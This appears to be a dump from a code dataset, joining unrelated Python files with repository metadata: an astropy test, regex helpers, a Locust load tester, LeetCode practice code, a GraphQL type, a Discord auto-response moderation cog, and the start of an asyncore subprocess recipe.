from __future__ import absolute_import, division, print_function, unicode_literals
from numpy.testing import assert_allclose
from astropy.units import Quantity
from ..exptest import exptest
from ..simulate import random_times
def test_exptest():
    """Regression test: exptest Mr statistic on simulated event time deltas."""
    rate = Quantity(10, "s^-1")
    # Fixed random_state makes the simulated time deltas reproducible.
    time_delta = random_times(100, rate=rate, return_diff=True, random_state=0)
    mr = exptest(time_delta)
    # Reference value pinned from a previous run (regression check).
    assert_allclose(mr, 0.11395763079)
| 1.742188 | 2 |
SpiderNest/core/regexs.py | thomaszdxsn/SpiderNest | 1 | 12767387 | """
author: thomaszdxsn
"""
import re
__all__ = ('RE_DATETIME', 'RE_IMG_SRC', 'RE_DATE', 'RE_UNIT_NUM', 'RE_CHINESE')
# "YYYY-MM-DD hh:mm:ss" style timestamps (2- or 4-digit year accepted).
RE_DATETIME = re.compile(r'\d{2,4}-\d{1,2}-\d{1,2} \d{1,2}:\d{1,2}:\d{1,2}')
# "YYYY-MM-DD" style dates.
RE_DATE = re.compile(r'\d{2,4}-\d{1,2}-\d{1,2}')
# src attribute of an <img> tag; DOTALL/MULTILINE let the tag span lines.
RE_IMG_SRC = re.compile(r'<img\s+src=[\'\"](.*?)[\'\"].*?/?>', flags=re.DOTALL|re.MULTILINE)
# A number optionally followed by the Chinese unit "万" (ten thousand).
RE_UNIT_NUM = re.compile(r'([\d.]+)(万)?')
# One or more consecutive CJK (Chinese) characters.
RE_CHINESE = re.compile(r'([\u4e00-\u9fa5]+)')
load-tester/loadTester/loadTester.py | artofimagination/snippets | 2 | 12767388 | <gh_stars>1-10
import time
from locust import HttpUser, task, between
from locust import events
import json
import random
userID = 1
class testUserAdd(HttpUser):
    """Locust user that mixes GET polls with user-insert POSTs."""
    # Wait 0.1-2 seconds between tasks.
    wait_time = between(0.1, 2)
    @task(3)
    def getUser(self):
        # Weighted 3x: plain GET against the root endpoint.
        self.client.get("/")
        pass
    @task
    def addUser(self):
        # POST a synthetic user; mark the request failed on non-200 status
        # or when the round trip takes longer than 5 seconds.
        with self.client.post(f"/insert?name=testUser{self.userID}&email=testEmail{self.userID}&password=<PASSWORD>", {}, catch_response=True) as response:
            if response.status_code != 200:
                response.failure(f"Got wrong response: {response.text}")
            elif response.elapsed.total_seconds() > 5.0:
                response.failure("Request took too long")
        # NOTE(review): random.random() yields a float in [0, 1), so later
        # user names embed a float — confirm this is intended for uniqueness
        # rather than an incrementing integer id.
        self.userID = random.random()
    def on_start(self):
        # NOTE(review): the `global userID` declaration is unused — only the
        # instance attribute below is ever read by the tasks.
        global userID
        self.userID = 1
| 2.546875 | 3 |
leetcode-1.py | liujiaboy/Suanfa | 0 | 12767389 | <gh_stars>0
class ListNode:
    """A singly linked list node holding ``val`` and a ``next`` pointer."""

    def __init__(self, val=0, next=None):
        self.val, self.next = val, next
def createList(l: list) -> ListNode:
    """Build a singly linked list from ``l`` and return its head (or None)."""
    sentinel = ListNode()
    tail = sentinel
    for item in l:
        tail.next = ListNode(item)
        tail = tail.next
    return sentinel.next
def printList(l: ListNode):
    """Print each node's value on its own line, then a blank separator."""
    node = l
    while node is not None:
        print(node.val)
        node = node.next
    print(" ")
'''
leetcode - 2 两数相加
# Definition for singly-linked list.
class ListNode:
def __init__(self, val=0, next=None):
self.val = val
self.next = next
def addTwoNumbers(l1: ListNode, l2: ListNode) -> ListNode:
header = current = ListNode()
plus = val = 0
while plus or l1 or l2:
val = plus
if l1:
l1, val = l1.next, l1.val + val
if l2:
l2, val = l2.next, l2.val + val
if val >= 10:
plus, val = 1, val - 10
else:
plus = 0
current.next = current = ListNode(val)
return header.next
l1 = [9,9,9,9,9,9,9]
l2 = [9,9,9,9]
listno1 = createList(l1)
listno2 = createList(l2)
printList(listno1)
printList(listno2)
list3 = addTwoNumbers(listno1, listno2)
printList(list3)
'''
'''
#leetcode - 3 最长子串
def lengthOfLongestSubstring(s: str) -> int:
if len(s) == 0:
return 0
tempS = []
maxL = 0
for c in s:
if c in tempS:
tempS[:] = tempS[tempS.index(c) + 1: ]
tempS.append(c)
maxL = maxL if maxL > len(tempS) else len(tempS)
return maxL
print(lengthOfLongestSubstring("aabaab!bb"))
'''
'''
def isPalindrome(x: int) -> bool:
if x < 0 or (x % 10 == 0 and x != 0):
return False
leftV, rightV = x, 0
while leftV > rightV:
rightV = rightV * 10 + leftV % 10
leftV = int(leftV / 10)
return leftV == rightV or leftV == int(rightV/10)
print(12 % 10)
print(isPalindrome(0))
'''
"""
def deleteDuplicates(head: ListNode) -> ListNode:
num = []
headL = l = ListNode()
while head:
if head.val not in num:
num.append(head.val)
l.next = l = ListNode(head.val)
head = head.next
return headL.next
l1 = createList([1,1,2,3,3])
printList(l1)
printList(deleteDuplicates(l1))
"""
class TreeNode:
    """A binary tree node with ``val``, ``left`` and ``right`` children."""

    def __init__(self, val=0, left=None, right=None):
        self.val, self.left, self.right = val, left, right
#[1,null,2,3]
def createTreeNode() -> TreeNode:
# l3 = TreeNode(3)
# l2 = TreeNode(2, l3)
# l1 = TreeNode(1)
# l1.right = l2
# return l1
# 1
# 4 3
# 2
l1 = TreeNode(1)
l2 = TreeNode(4)
l3 = TreeNode(3)
l4 = TreeNode(2)
l1.left = l2
l1.right = l3
l2.right = l4
return l1
#中序遍历
def inorderTraversal(root: TreeNode) -> []:
tempL = []
intL = []
while root or len(tempL):
while root:
tempL.append(root)
root = root.left
root = tempL.pop()
intL.append(root.val)
root = root.right
return intL
"""
# 先序 递归调用
def xianxu(root: TreeNode) -> []:
def bianli(node: TreeNode):
if not node: return
intL.append(node.val)
bianli(node.left)
bianli(node.right)
intL = []
bianli(root)
return intL
"""
"""
# 先序 使用队列思想
def xianxu(root: TreeNode) -> []:
nodeL = []
intL = []
while root or len(nodeL):
while root:
nodeL.append(root)
intL.append(root.val)
root = root.left
root = nodeL.pop()
root = root.right
return intL
"""
"""
# 后续遍历:左 右 中
def houxu(root: TreeNode) -> []:
nodeL = []
intL = list()
prev = None
while root or len(nodeL):
while root:
nodeL.append(root)
root = root.left
root = nodeL.pop()
if not root.right or prev == root.right:
intL.append(root.val)
prev = root
root = None
else:
nodeL.append(root)
root = root.right
return intL
L = createTreeNode()
print(houxu(L))
"""
"""
# 链表反转
l1 = [1,2,3,4,5,6,7, 8, 9]
listno1 = createList(l1)
def fanzhuan(l: ListNode) -> ListNode:
header = current = ListNode()
while l:
l1 = ListNode(l.val)
l1.next = header.next
header.next = l1
l = l.next
return header.next
#printList(fanzhuan(listno1))
"""
# LRU缓存机制
class DlinkedNode:
    """A doubly linked list node: a key/value pair plus pre/next links."""

    def __init__(self, key=0, value=0):
        self.key, self.value = key, value
        self.pre = self.next = None
class Solution:
    """LRU cache driver.

    ``LRU`` replays a list of operations ([1, key, value] = set,
    [2, key] = get) against a cache of capacity ``k`` and returns the
    results of the get operations (-1 on a miss).
    """
    def __init__(self):
        # BUGFIX: these used to be *class* attributes, so cache state leaked
        # between Solution instances (and across repeated LRU() runs in the
        # same process). They are now per-instance.
        self.cache = dict()
        # Recency order, most recently used first. A plain list keeps the
        # original O(n) behavior; a doubly linked list would make it O(1).
        self.node = list()
        self.count = 0
    def LRU(self, operations: list, k: int) -> list:
        """Replay ``operations`` with capacity ``k``; return get() results."""
        self.count = k
        resultL = []
        for op in operations:
            if op[0] == 1:
                self.set(op[1], op[2])
            elif op[0] == 2:
                resultL.append(self.get(op[1]))
        return resultL
    def set(self, key: int, value: int):
        """Insert/update ``key`` as most recently used; evict LRU if full."""
        if key in self.cache:
            # Already cached: drop the stale recency entry before re-adding.
            self.node.remove(key)
        # Insert at the front (most recently used position).
        self.cache[key] = value
        self.node.insert(0, key)
        if len(self.node) > self.count:
            # Over capacity: evict the least recently used key.
            delkey = self.node.pop()
            self.cache.pop(delkey)
    def get(self, key: int) -> int:
        """Return the cached value (refreshing recency) or -1 on a miss."""
        if key in self.cache:
            self.node.remove(key)
            self.node.insert(0, key)
            return self.cache[key]
        else:
            return -1
#sol = Solution()
#operations = [[1,1,1],[1,2,2],[1,3,2],[2,1],[1,4,4],[2,2]]
#print(sol.LRU(operations, 3))
"""
# 排列好的有重复数据的list,二分查找,并输出最小的值,
def search(numss: list, target: int):
if not numss:
return -1
low, high= 0, len(numss)-1
idx = -1
while low <= high:
mid = (low + high) // 2
if numss[mid] < target:
low = mid + 1
elif numss[mid] > target:
high = mid - 1
else:
idx = mid
high = mid - 1
return idx
#list1 = [1,2,2,4]
list1 = [-2,1,2] #2
print(search(list1, 2))
"""
"""
def maxLengthList(arr:[] ) -> []:
# write code here
# 采用队列的思路,先进先出,有重复的则移除前所有的数据
res = []
temp = []
for i in arr:
if i in temp:
temp[:] = temp[temp.index(i) + 1 :]
temp.append(i)
if len(res) < len(temp):
res = temp.copy()
return res
def maxLengthList2(arr:[] ) -> int:
# write code here
# 采用队列的思路,先进先出,有重复的则移除前所有的数据
temp = []
maxL = 0
for i in arr:
if i in temp:
temp[:] = temp[temp.index(i) + 1 :]
temp.append(i)
if maxL < len(temp):
maxL = len(temp)
return maxL
arr = [1,2,3,1,2,3,2,2]
arr = [2,3,4,5]
print(maxLengthList2(arr))
"""
"""
def getLessNums(tinput: [], k: int) -> []:
for i in range(0, len(tinput)):
minIdx = i
minVal = tinput[i]
for j in range(i + 1, len(tinput)):
if minVal > tinput[j]:
minVal = tinput[j]
minIdx = j
tinput[i], tinput[minIdx] = minVal, tinput[i]
if i == k:
break
return tinput[0:k]
print(getLessNums([4,5,1,6,2,7,3,8],4))
"""
"""
这里会把B merge到A中。比如A = [1,2,3], B = [2,5,6]
调用方法会变成A=[1,2,3,0,0,0]自动扩展3个元素
然后把Bmerge到A中,最后的结果为[1,2,2,3,5,6]
"""
"""
def mergeTwoList(A:[], m: int, B:[], n:int):
# 1. 使用双指针,这里直接使用m和n即可
# 2. A、B从最后一个元素进行对比
# 3. A的值比B大,则A[m-1]的值移动到最后,指针左移
# 4. B的值比A大,则直接赋值,指针左移
if not A or not B: return
while m > 0 and n > 0:
#
if A[m-1] >= B[n-1]:
A[m+n-1] = A[m-1]
m -= 1
else:
A[m+n-1] = B[n-1]
n -= 1
if n > 0: A[:n] = B[:n]
A = [1,2,3,0,0,0]
B = [2,5,6]
mergeTwoList(A, 3, B, 3)
print(A)
"""
def solveStr(s: str) -> str:
    """Return ``s`` reversed, swapping characters in place on a list copy."""
    chars = list(s)
    left, right = 0, len(chars) - 1
    while left < right:
        chars[left], chars[right] = chars[right], chars[left]
        left += 1
        right -= 1
    return "".join(chars)
print(solveStr("abcde")) | 3.75 | 4 |
gql/schema/Media.py | allanwright/media-classifier-api | 1 | 12767390 | <reponame>allanwright/media-classifier-api
import graphene
from .Classification import Classification
from .Entity import Entity
class Media(graphene.ObjectType):
    """GraphQL type describing a media file name plus ML-derived metadata."""
    name = graphene.String()
    classification = graphene.Field(Classification)
    entities = graphene.List(Entity)
    @staticmethod
    def resolve_classification(parent, info):
        # Run the classifier (supplied via the request context) on the name.
        prediction = info.context['classifier'].predict(parent.name)
        classification = Classification()
        classification.label = prediction['label']
        classification.confidence = prediction['probability']
        return classification
    @staticmethod
    def resolve_entities(parent, info):
        # NOTE(review): assumes recognizer.predict yields (type, value)
        # pairs — confirm against the recognizer implementation.
        return [{ 'type': k, 'value': v } for (k, v) in info.context['recognizer'].predict(parent.name)]
| 2.515625 | 3 |
Cogs/Responses.py | camielverdult/CorpBot.py | 0 | 12767391 | <reponame>camielverdult/CorpBot.py<filename>Cogs/Responses.py
import discord
import re
import time
from discord.ext import commands
from Cogs import Settings, DisplayName, Utils, Nullify, PickList
def setup(bot):
    """Extension entry point: fetch the shared Settings cog and register Responses."""
    # Add the bot and deps
    settings = bot.get_cog("Settings")
    bot.add_cog(Responses(bot, settings))
class Responses(commands.Cog):
    """Cog that lets bot-admins define regex-triggered auto-responses.

    Triggers are stored per-guild under the ``MessageResponses`` setting as a
    ``{regex: response}`` mapping.  Responses support value substitutions
    ([[user]], [[atuser]], [[server]], [[here]], [[everyone]]) and behavioral
    flags ([[delete]], [[ban]], [[kick]], [[mute]], [[mute:#]], [[suppress]]).
    """

    # Init with the bot reference, and a reference to the settings var
    def __init__(self, bot, settings):
        self.bot = bot
        self.settings = settings
        global Utils, DisplayName
        Utils = self.bot.get_cog("Utils")
        DisplayName = self.bot.get_cog("DisplayName")
        # Regex values for the supported substitutions and behavioral flags
        self.regexUserName = re.compile(r"\[\[user\]\]", re.IGNORECASE)
        self.regexUserPing = re.compile(r"\[\[atuser\]\]", re.IGNORECASE)
        self.regexServer = re.compile(r"\[\[server\]\]", re.IGNORECASE)
        self.regexHere = re.compile(r"\[\[here\]\]", re.IGNORECASE)
        self.regexEveryone = re.compile(r"\[\[everyone\]\]", re.IGNORECASE)
        self.regexDelete = re.compile(r"\[\[delete\]\]", re.IGNORECASE)
        self.regexMute = re.compile(r"\[\[mute:?\d*\]\]", re.IGNORECASE)
        self.regexKick = re.compile(r"\[\[kick\]\]", re.IGNORECASE)
        self.regexBan = re.compile(r"\[\[ban\]\]", re.IGNORECASE)
        self.regexSuppress = re.compile(r"\[\[suppress\]\]", re.IGNORECASE)

    async def _get_response(self, ctx, message):
        """Return a dict describing the first trigger that fully matches
        ``message`` (with newlines flattened), or {} when nothing matches.

        The dict may contain: matched, delete, suppress, action, mute_time
        and message (the substituted response text).
        """
        message_responses = self.settings.getServerStat(
            ctx.guild, "MessageResponses", {})
        if not message_responses:
            return {}
        # Check for matching response triggers here
        # Remove newlines for better matching
        content = message.replace("\n", " ")
        for trigger in message_responses:
            if not re.fullmatch(trigger, content):
                continue
            response = {"matched": trigger}
            # Got a full match - build the message, send it and bail
            m = message_responses[trigger]
            if self.regexDelete.search(m):
                response["delete"] = True
            if self.regexSuppress.search(m):
                response["suppress"] = True
            # Only the most severe action applies: ban > kick > mute
            action = "ban" if self.regexBan.search(m) else "kick" if self.regexKick.search(
                m) else "mute" if self.regexMute.search(m) else None
            if action:
                response["action"] = action
                if action == "mute":
                    # Let's get the mute time - if any
                    try:
                        response["mute_time"] = int(self.regexMute.search(
                            m).group(0).replace("]]", "").split(":")[-1])
                    except Exception:
                        # No numeric suffix ([[mute]]) -> indefinite mute
                        pass
            m = re.sub(self.regexUserName, "{}".format(
                DisplayName.name(ctx.author)), m)
            m = re.sub(self.regexUserPing, "{}".format(ctx.author.mention), m)
            m = re.sub(self.regexServer, "{}".format(
                Nullify.escape_all(ctx.guild.name)), m)
            m = re.sub(self.regexHere, "@here", m)
            m = re.sub(self.regexEveryone, "@everyone", m)
            # Strip out leftovers from delete, ban, kick, mute, and suppress
            for sub in (self.regexDelete, self.regexBan, self.regexKick, self.regexMute, self.regexSuppress):
                m = re.sub(sub, "", m)
            response["message"] = m
            return response
        return {}

    @commands.Cog.listener()
    async def on_message(self, message):
        # Gather exclusions - no bots, no dms, and don't check if running a command
        if message.author.bot:
            return
        if not message.guild:
            return
        ctx = await self.bot.get_context(message)
        if ctx.command:
            return
        # Gather the response info - if any
        response = await self._get_response(ctx, message.content)
        if not response:
            return
        # See if we're admin/bot-admin - and bail if suppressed
        if Utils.is_bot_admin(ctx) and response.get("suppress"):
            return
        # Walk punishments first in order of severity (ban -> kick -> mute)
        if response.get("action") in ("ban", "kick"):
            action = ctx.guild.ban if response["action"] == "ban" else ctx.guild.kick
            await action(ctx.author, reason="Response trigger matched")
        elif response.get("action") == "mute":
            mute = self.bot.get_cog("Mute")
            mute_time = None if not response.get("mute_time") else int(
                time.time())+response["mute_time"]
            if mute:
                await mute._mute(ctx.author, ctx.guild, cooldown=mute_time)
        # Check if we need to delete the message
        if response.get("delete"):
            try:
                await message.delete()
            except Exception:
                pass  # RIP - couldn't delete that one, I guess
        # Don't send an empty message, or one with just whitespace
        if response.get("message", "").strip():
            return await ctx.send(response["message"], allowed_mentions=discord.AllowedMentions.all())

    @commands.command()
    async def addresponse(self, ctx, regex_trigger=None, *, response=None):
        """Adds a new response for the regex trigger - or updates the response if the trigger exists already.  If the trigger has spaces, it must be wrapped in quotes (bot-admin only).

        Value substitutions:
        [[user]]     = user name
        [[atuser]]   = user mention
        [[server]]   = server name
        [[here]]     = @here ping
        [[everyone]] = @everyone ping

        Standard user behavioral flags (do not apply to admin/bot-admin):
        [[delete]]   = delete the original message
        [[ban]]      = bans the message author
        [[kick]]     = kicks the message author
        [[mute]]     = mutes the author indefinitely
        [[mute:#]]   = mutes the message author for # seconds

        Admin/bot-admin behavioral flags:
        [[suppress]] = suppresses output for admin/bot-admin author matches

        Example:  $addresponse "(?i)(hello there|\\btest\\b).*" [[atuser]], this is a test!

        This would look for a message starting with the whole word "test" or "hello there" (case-insensitive) and respond by pinging the user and saying "this is a test!"
        """
        if not await Utils.is_bot_admin_reply(ctx):
            return
        if not regex_trigger or not response:
            return await ctx.send("Usage: `{}addresponse regex_trigger response`".format(ctx.prefix))
        # Ensure the regex is valid
        try:
            re.compile(regex_trigger)
        except Exception as e:
            return await ctx.send(Nullify.escape_all(str(e)))
        # Save the trigger and response
        message_responses = self.settings.getServerStat(
            ctx.guild, "MessageResponses", {})
        context = "Updated" if regex_trigger in message_responses else "Added new"
        message_responses[regex_trigger] = response
        self.settings.setServerStat(
            ctx.guild, "MessageResponses", message_responses)
        return await ctx.send("{} response trigger!".format(context))

    @commands.command()
    async def edittrigger(self, ctx, response_index=None, *, regex_trigger=None):
        """Edits the regex trigger for the passed index.  The triggers passed here do not require quotes if there are spaces (bot-admin only)."""
        if not await Utils.is_bot_admin_reply(ctx):
            return
        if not regex_trigger or not response_index:
            return await ctx.send("Usage: `{}edittrigger response_index regex_trigger`".format(ctx.prefix))
        message_responses = self.settings.getServerStat(
            ctx.guild, "MessageResponses", {})
        if not message_responses:
            return await ctx.send("No responses setup!  You can use the `{}addresponse` command to add some.".format(ctx.prefix))
        # Ensure the passed index is valid
        try:
            response_index = int(response_index)
            assert 0 < response_index <= len(message_responses)
        except:
            return await ctx.send("You need to pass a valid integer from 1 to {:,}.\nYou can get a numbered list with `{}responses`".format(len(message_responses), ctx.prefix))
        # Ensure the regex is valid
        try:
            re.compile(regex_trigger)
        except Exception as e:
            return await ctx.send(Nullify.escape_all(str(e)))
        # Update the response, preserving the original ordering
        ordered_responses = {}
        for index, key in enumerate(message_responses, start=1):
            ordered_responses[regex_trigger if index ==
                              response_index else key] = message_responses[key]
        self.settings.setServerStat(
            ctx.guild, "MessageResponses", ordered_responses)
        return await ctx.send("Updated response trigger at index {:,}!".format(response_index))

    @commands.command()
    async def editresponse(self, ctx, response_index=None, *, response=None):
        """Edits the response for the passed index.  The response passed here does not require quotes if there are spaces (bot-admin only).

        Value substitutions:
        [[user]]     = user name
        [[atuser]]   = user mention
        [[server]]   = server name
        [[here]]     = @here ping
        [[everyone]] = @everyone ping

        Standard user behavioral flags (do not apply to admin/bot-admin):
        [[delete]]   = delete the original message
        [[ban]]      = bans the message author
        [[kick]]     = kicks the message author
        [[mute]]     = mutes the author indefinitely
        [[mute:#]]   = mutes the message author for # seconds

        Admin/bot-admin behavioral flags:
        [[suppress]] = suppresses output for admin/bot-admin author matches

        Example:  $editresponse 1 [[atuser]], this is a test!

        This would edit the first response trigger to respond by pinging the user and saying "this is a test!"
        """
        if not await Utils.is_bot_admin_reply(ctx):
            return
        if not response or not response_index:
            return await ctx.send("Usage: `{}editresponse response_index response`".format(ctx.prefix))
        message_responses = self.settings.getServerStat(
            ctx.guild, "MessageResponses", {})
        if not message_responses:
            return await ctx.send("No responses setup!  You can use the `{}addresponse` command to add some.".format(ctx.prefix))
        # Ensure the passed index is valid
        try:
            response_index = int(response_index)
            assert 0 < response_index <= len(message_responses)
        except:
            return await ctx.send("You need to pass a valid integer from 1 to {:,}.\nYou can get a numbered list with `{}responses`".format(len(message_responses), ctx.prefix))
        # Update the response
        message_responses[list(message_responses)[response_index-1]] = response
        self.settings.setServerStat(
            ctx.guild, "MessageResponses", message_responses)
        return await ctx.send("Updated response at index {:,}!".format(response_index))

    @commands.command()
    async def responses(self, ctx):
        """Lists the response triggers and their responses (bot-admin only)."""
        if not await Utils.is_bot_admin_reply(ctx):
            return
        message_responses = self.settings.getServerStat(
            ctx.guild, "MessageResponses", {})
        if not message_responses:
            return await ctx.send("No responses setup!  You can use the `{}addresponse` command to add some.".format(ctx.prefix))
        entries = [{"name": "{}. ".format(i)+Nullify.escape_all(x), "value": Nullify.escape_all(
            message_responses[x])} for i, x in enumerate(message_responses, start=1)]
        return await PickList.PagePicker(title="Current Responses", list=entries, ctx=ctx).pick()

    @commands.command()
    async def remresponse(self, ctx, *, regex_trigger_number=None):
        """Removes the passed response trigger (bot-admin only)."""
        if not await Utils.is_bot_admin_reply(ctx):
            return
        if not regex_trigger_number:
            return await ctx.send("Usage: `{}remresponse regex_trigger_number`\nYou can get a numbered list with `{}responses`".format(ctx.prefix, ctx.prefix))
        message_responses = self.settings.getServerStat(
            ctx.guild, "MessageResponses", {})
        if not message_responses:
            return await ctx.send("No responses setup!  You can use the `{}addresponse` command to add some.".format(ctx.prefix))
        # Make sure we got a number, and it's within our list range
        try:
            regex_trigger_number = int(regex_trigger_number)
            assert 0 < regex_trigger_number <= len(message_responses)
        except:
            return await ctx.send("You need to pass a valid integer from 1 to {:,}.\nYou can get a numbered list with `{}responses`".format(len(message_responses), ctx.prefix))
        # Remove it, save, and report
        message_responses.pop(list(message_responses)[
                              regex_trigger_number-1], None)
        self.settings.setServerStat(
            ctx.guild, "MessageResponses", message_responses)
        return await ctx.send("Response trigger removed!")

    @commands.command()
    async def clearresponses(self, ctx):
        """Removes all response triggers (bot-admin only)."""
        if not await Utils.is_bot_admin_reply(ctx):
            return
        self.settings.setServerStat(ctx.guild, "MessageResponses", {})
        return await ctx.send("All response triggers removed!")

    @commands.command()
    async def mvresponse(self, ctx, response_index=None, target_index=None):
        """Moves the passed response index to the target index (bot-admin only)."""
        if not await Utils.is_bot_admin_reply(ctx):
            return
        if response_index == None or target_index == None:
            return await ctx.send("Usage: `{}mvresponse [response_index] [target_index]`\nYou can get a numbered list with `{}responses`".format(ctx.prefix, ctx.prefix))
        message_responses = self.settings.getServerStat(
            ctx.guild, "MessageResponses", {})
        if not message_responses:
            return await ctx.send("No responses setup!  You can use the `{}addresponse` command to add some.".format(ctx.prefix))
        # Make sure our indices are within the proper range
        try:
            response_index = int(response_index)
            target_index = int(target_index)
            assert all((0 < x <= len(message_responses)
                        for x in (response_index, target_index)))
        except:
            # BUGFIX: "intergers" -> "integers" in the user-facing message
            return await ctx.send("Both `response_index` and `target_index` must be valid integers from 1 to {:,}.\nYou can get a numbered list with `{}responses`".format(len(message_responses), ctx.prefix))
        if response_index == target_index:
            return await ctx.send("Both indices are the same - nothing to move!")
        # Let's get the keys in a list - remove the target, add it to the desired index, then build a new dict with the elements
        keys = list(message_responses)
        keys.insert(target_index-1, keys.pop(response_index-1))
        ordered_responses = {}
        for key in keys:
            ordered_responses[key] = message_responses[key]
        self.settings.setServerStat(
            ctx.guild, "MessageResponses", ordered_responses)
        return await ctx.send("Moved response from {:,} to {:,}!".format(response_index, target_index))

    @commands.command()
    async def chkresponse(self, ctx, *, check_string=None):
        """Reports a breakdown of the first match (if any) in the responses for the passed check string (bot-admin only)."""
        if not await Utils.is_bot_admin_reply(ctx):
            return
        if check_string == None:
            # BUGFIX: the usage text previously advertised the wrong command
            # name ("checkresponse"); this command is registered as chkresponse.
            return await ctx.send("Usage: `{}chkresponse [check_string]`\nYou can get a numbered list with `{}responses`".format(ctx.prefix, ctx.prefix))
        message_responses = self.settings.getServerStat(
            ctx.guild, "MessageResponses", {})
        if not message_responses:
            return await ctx.send("No responses setup!  You can use the `{}addresponse` command to add some.".format(ctx.prefix))
        response = await self._get_response(ctx, check_string)
        if not response:
            return await ctx.send("No matches!")
        # Got a match - let's print out what it will do
        description = Nullify.escape_all(
            response.get("matched", "Unknown match"))
        entries = []
        # Let's walk the reponse and add values
        entries.append({"name": "Output Suppressed for Admin/Bot-Admin:",
                        "value": "Yes" if response.get("suppress") else "No"})
        if response.get("action") == "mute":
            mute_time = "indefinitely" if not response.get("mute_time") else "for {:,} second{}".format(
                response["mute_time"], "" if response["mute_time"] == 1 else "s")
            entries.append(
                {"name": "Action:", "value": "Mute {}".format(mute_time)})
        else:
            entries.append({"name": "Action:", "value": str(
                response.get("action")).capitalize()})
        entries.append(
            {"name": "Delete:", "value": "Yes" if response.get("delete") else "No"})
        entries.append({"name": "Output Message:", "value": "None" if not response.get(
            "message", "").strip() else response["message"]})
        return await PickList.PagePicker(title="Matched Response", description=description, list=entries, ctx=ctx).pick()
| 2.265625 | 2 |
PubNubPublishARM/GetUniqueId.py | IDEO-coLAB/demo-vehicle-rec-microservice | 1 | 12767392 | # File : GetUniqueId.py
# Subprogram to generate a unique id for Pubnub message
# Author: <NAME>
import uuid
def GenerateId():
    """Return a freshly generated time-based (uuid1) id as a string."""
    return str(uuid.uuid1())
| 2.796875 | 3 |
recipes/Python/576957_Asynchronous_subprocess_using/recipe-576957.py | tdiprima/code | 2,023 | 12767393 | <gh_stars>1000+
#!/usr/bin/env python
"""asyncsubproc.py: Asynchronous subprocess communication using asyncore.
The `AsyncPopen` class wraps the I/O pipes from `Popen` in asynchronous
dispatchers, providing asynchronous communication with the subprocess using
`asyncore.loop()` to read and write in parallel with other I/O. The
`SubprocessExecutor` class wraps `AsyncPopen` in an `Executor`, allowing
inline subprocess execution using a generator.
Full-duplex Communication:
Data that the subprocess writes might not be made available to the parent until
the subprocess calls `flush()` or exits; thus, a parent which attempts to write
data, read a response, and then write new data contingent on the response might
find itself deadlocked. There seems to be no way for the parent process to
force flushing of the subprocess output; changing the value of the `bufsize`
parameter to `Popen()` to zero (or any other value) doesn't do it, and
`asyncore.file_dispatcher` already sets `O_NONBLOCK` on the pipes.
Subprocess Exit:
Detecting subprocess exit while avoiding zombie subprocesses can be tricky in
asynchronous code. Calling `wait()` on a subprocess would block, leaving three
alternatives for checking for subprocess exit:
1) Exit the asynchronous select loop (e.g. `asyncore.loop()`) occasionally
to call `poll()` on any unterminated subprocesses. This requires maintaining a
list of all unterminated subprocess objects, along with any context needed to
handle the subprocess exit.
2) Set a handler for `SIGCHLD` which calls `os.waitpid(-1, os.WNOHANG)`,
and then use the return value to locate the asynchronous process object and
handle the subprocess exit. This must be done in a loop to avoid missing
consolidated signals, requires maintaining a list of all unterminated
subprocesses, and is limited by reentrancy restrictions on signal handlers.
3) Check for `stdout` and `stderr` to both be closed, which can be done as
part of the asynchronous loop which reads data. This requires that at least one
of `stdout` and `stderr` be a pipe, but an asynchronous subprocess is probably
unnecessary in the first place if neither is a pipe. There is no absolute
guarantee that the subprocess has exited when `stdout` and `stderr` have
closed, but once they have, no more data is coming. However, because `wait()`
is not being called on the subprocesses, special care has to be taken to avoid
leaving zombie subproceses. There are again three alternatives:
a) Set `SIGCHLD` to `SIG_IGN`. This should work on most varieties of UNIX
including Mac OS X. However, it prevents collecting the exit status of the
subprocess; `poll()` will return `None` and `wait()` will raise an `OSError`
exception.
b) Set a handler for `SIGCHLD` as in solution (2) above; if this is to be
implemented, it may be better to simply implement solution (2) rather than
waiting for the output pipes to close in the first place.
c) Call `wait()` on the subprocess after stdout and stderr are closed.
While this will block (briefly), it should be reasonably safe unless the
subprocess does something very unusual.
`SubprocessExecutor` waits for `stdout` and `stderr` to both be closed, and
then calls `wait()` on the subprocess if no handler for `SIGCHLD` is set.
References:
http://code.activestate.com/recipes/577600/ [queued SIGALRM alarms]
http://code.activestate.com/recipes/576965/ [event-based asynchronous pattern]
http://code.activestate.com/recipes/576967/ [asynchronous pipe I/O]
"""
import os
import sys
import signal
import threading
from traceback import print_exc
from subprocess import Popen, PIPE
from logging import ERROR, INFO
import alarm
from asyncpipes import PipeDispatcher, InputPipeDispatcher, OutputPipeDispatcher
from worker import Executor
from observer import Observable
if __name__ == '__main__':
import optparse
from asyncore import loop
from string import digits
from time import sleep
from worker import execute, ExecutionQueue
__version__ = '$Revision: 3414 $'.split()[1]
__usage__ = 'usage: %prog [options] [data]'
class AsyncPopen(Observable, Popen):
    """An extension to Popen which creates a subprocess with asynchronous
    pipes for input and output. Pipe output can be read using an Observer
    pattern while asyncore.loop() is run.

    Also contains additional small extensions, such as a subprocess timeout
    and a fix to handling of signals for subprocesses.
    """
    def __init__(self, argv, map=None, timeout=None, close_when_done=True,
            stdin=PIPE, stdout=PIPE, stderr=PIPE, preexec_fn=None, bufsize=0, **popen_keyw):
        """Accepts all the same arguments and keywords as `subprocess.Popen`.
        Input or outputs specified as `PIPE` (now the default) for are wrapped
        in an asynchronous pipe dispatcher.

        The timeout is used to create an alarm, which can be cancelled by
        calling `cancel_timeout()`, `communicate()`, `wait()` or `kill()`.
        """
        Observable.__init__(self)
        self._map = map
        # Create the subprocess itself, wrapping preexec_fn in the clear_signals call
        Popen.__init__(self, argv, preexec_fn=lambda: self.clear_signals(preexec_fn),
            stdin=stdin, stdout=stdout, stderr=stderr, **popen_keyw)
        # Set the timeout on the subprocess.  If it fails, ignore the failure.
        try:
            fto = float(timeout)
            self._alarmobj = alarm.alarm(fto, self.kill) if fto > 0 else None
        except Exception:
            # timeout was None / non-numeric, or the alarm could not be set;
            # in either case the subprocess simply runs without a deadline.
            self._alarmobj = None
        # Wrap the pipe I/O. Sets the Popen and pipe buffer sizes the same; perhaps not optimal.
        if stdout == PIPE:
            self.stdout = OutputPipeDispatcher(self.stdout, map=map, ignore_broken_pipe=True,
                universal_newlines=self.universal_newlines, maxdata=bufsize)
            self.stdout.obs_add(self._pipe_event)
        if stderr == PIPE:
            self.stderr = OutputPipeDispatcher(self.stderr, map=map, ignore_broken_pipe=True,
                universal_newlines=self.universal_newlines, maxdata=bufsize)
            self.stderr.obs_add(self._pipe_event)
